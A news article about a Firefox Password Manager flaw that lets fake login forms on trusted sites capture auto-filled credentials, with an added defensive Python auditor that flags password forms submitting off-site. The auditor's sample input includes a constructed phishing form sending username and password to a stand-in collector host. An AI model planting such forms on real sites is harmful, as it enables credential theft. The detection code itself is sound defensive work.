A new security vulnerability was discovered yesterday in Mozilla Firefox, the second most popular web browser. It is called a reverse cross-site request, or RCSR, flaw. It can be exploited to steal confidential user information (passwords, login names, personal details) stored in the Firefox Password Manager.
Usually, when the user visits a web site that he has saved login information for, the Firefox Password Manager automatically fills in the login name and password in web forms. Then the user only has to press the Submit button. This allows logging in instantly without having to enter the necessary information every time such a web site is accessed.
However, Firefox does not check the address of the web page it enters confidential user information into, and simply fills in the forms. That is fine when a page is safe, but an attacker can create a fake login form on a trusted web site and easily steal the information.
Working exploits have already been seen on the popular social-networking site MySpace. Similar exploits might be hosted on blogs, forums or other sites that allow users to add their own HTML code. Phishers might also be interested in exploiting the new flaw.
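A check that a site accepting user-supplied HTML can run before publishing it, given here as an added example that is not part of the original article: it flags any form that contains a password field and submits to a different origin than the page hosting it. That the fake form sends its data off-site is an assumption of this example, and the host names, function names and sample markup are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

def origin(url):
    """(scheme, host, port): what a browser treats as one site."""
    p = urlsplit(url)
    return (p.scheme, p.hostname, p.port or {"http": 80, "https": 443}.get(p.scheme))

class LoginFormAuditor(HTMLParser):
    """Finds forms that hold a password field and submit off-origin."""
    def __init__(self, page_url):
        super().__init__()
        self.page_url, self.findings = page_url, []
        self._targets, self._has_password = None, False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.end_form()
            # A missing or empty action submits back to the hosting page.
            self._targets = [urljoin(self.page_url, a.get("action") or "")]
        elif self._targets is not None and tag in ("input", "button"):
            if (a.get("type") or "").lower() == "password":
                self._has_password = True
            if a.get("formaction"):  # per-button override of the form action
                self._targets.append(urljoin(self.page_url, a["formaction"]))

    def handle_endtag(self, tag):
        if tag == "form":
            self.end_form()

    def end_form(self):
        if self._targets and self._has_password:
            here = origin(self.page_url)
            self.findings += [t for t in self._targets if origin(t) != here]
        self._targets, self._has_password = None, False

def audit(page_url, html):
    auditor = LoginFormAuditor(page_url)
    auditor.feed(html)
    auditor.close()
    auditor.end_form()  # a form left unclosed still counts
    return auditor.findings

# Constructed sample: user-supplied HTML on a hypothetical profile page.
PAGE = "https://social.example/profile/alice"
SAMPLE = ('<form action="https://collector.example/save">'
          '<input name="user"><input type="password" name="pass"></form>'
          '<form action="/login"><input type="password" name="pass"></form>')
```

Calling `audit(PAGE, SAMPLE)` returns only the first form's target; the second form posts back to the hosting site and is not reported.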
Mozilla developers are aware of the RCSR vulnerability. However, there is no patch yet.
It must be noted that Firefox's rival, Microsoft Internet Explorer 7, might also be vulnerable. It includes the functionality to save passwords and login names, and also does not check the address of a web page properly. However, Internet Explorer usually does not automatically fill in login details the way Firefox does.
Both current branches of Mozilla Firefox (1.x and 2 releases) are vulnerable. Users are advised to stop using the Firefox Password Manager and log in manually.
To disable the Password Manager, navigate to Tools > Options… > Security and uncheck the Remember passwords for sites option. Press OK. Please note that this will remove all your saved passwords and login names, so make sure to write them down first.